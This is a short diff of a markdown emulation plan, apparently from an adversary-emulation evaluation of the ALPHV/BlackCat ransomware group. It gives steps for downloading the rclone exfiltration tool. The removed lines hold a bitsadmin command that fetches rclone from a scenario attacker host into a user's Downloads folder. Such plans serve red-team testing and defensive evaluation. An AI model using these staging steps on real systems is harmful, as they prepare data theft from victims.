attackevals/ael/ManagedServices/alphv_blackcat/Emulation_Plan/ALPHV_BlackCat_Scenario.md

     ```
     https://github.com/rclone/rclone/releases/download/v1.64.0/rclone-v1.64.0-windows-amd64.zip
     ```
-    * :heavy_exclamation_mark: If OVR testing, you will not have internet access to browse to GitHub.
-Instead:
-    * Open a non-elevated PowerShell and execute:
-        ```
-        bitsadmin /transfer ovr2 /download http://the-inator.com/digirevenge/rclone-v1.64.0-windows-amd64.zip C:\Users\zorimoto\Downloads\rclone-v1.64.0-windows-amd64.zip
-        ```

 * Go to the Downloads folder, right-click the rclone zip, click "Extract all..." from the menu, and in the window that opens, click the Extract